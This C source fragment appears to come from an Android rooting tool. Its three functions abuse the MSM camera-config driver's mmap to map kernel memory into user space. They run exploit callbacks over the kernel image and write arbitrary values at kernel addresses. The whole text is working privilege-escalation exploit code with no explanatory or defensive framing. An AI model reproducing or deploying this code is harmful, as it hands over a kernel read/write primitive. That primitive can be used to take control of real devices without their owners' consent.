static bool attempt_mmap_msm_cameraconfig_exploit(exploit_memory_callback_t callback_func, void *callback_param) { unsigned long int offset; int fd_video, fd_config; void *address; bool result; offset = get_kernel_physical_offset(); if (offset) { msm_cameraconfig_set_kernel_phys_offset(offset - 0x00008000); } address = msm_cameraconfig_mmap(&fd_video, &fd_config); if (address == MAP_FAILED) { return false; } result = callback_func(msm_cameraconfig_convert_to_mmaped_address((void *)PAGE_OFFSET, address), KERNEL_SIZE, callback_param); msm_cameraconfig_munmap(address, fd_video, fd_config); return result; }
bool msm_cameraconfig_run_exploit(bool(*exploit_callback)(void *mmap_base_address, void *user_data), void *user_data) { void *mapped_address = NULL; int fd_video; int fd_config; bool success; mapped_address = msm_cameraconfig_mmap(&fd_video, &fd_config); if (mapped_address == MAP_FAILED) { return false; } success = exploit_callback(mapped_address, user_data); msm_cameraconfig_munmap(mapped_address, fd_video, fd_config); return success; }
bool msm_cameraconfig_write_value_at_address(unsigned long int address, int value) { void *mmap_address = NULL; int *write_address; int fd_video; int fd_config; mmap_address = msm_cameraconfig_mmap(&fd_video, &fd_config); if (mmap_address == MAP_FAILED) { return false; } write_address = msm_cameraconfig_convert_to_mmaped_address((void*)address, mmap_address); *write_address = value; msm_cameraconfig_munmap(mmap_address, fd_video, fd_config); return true; }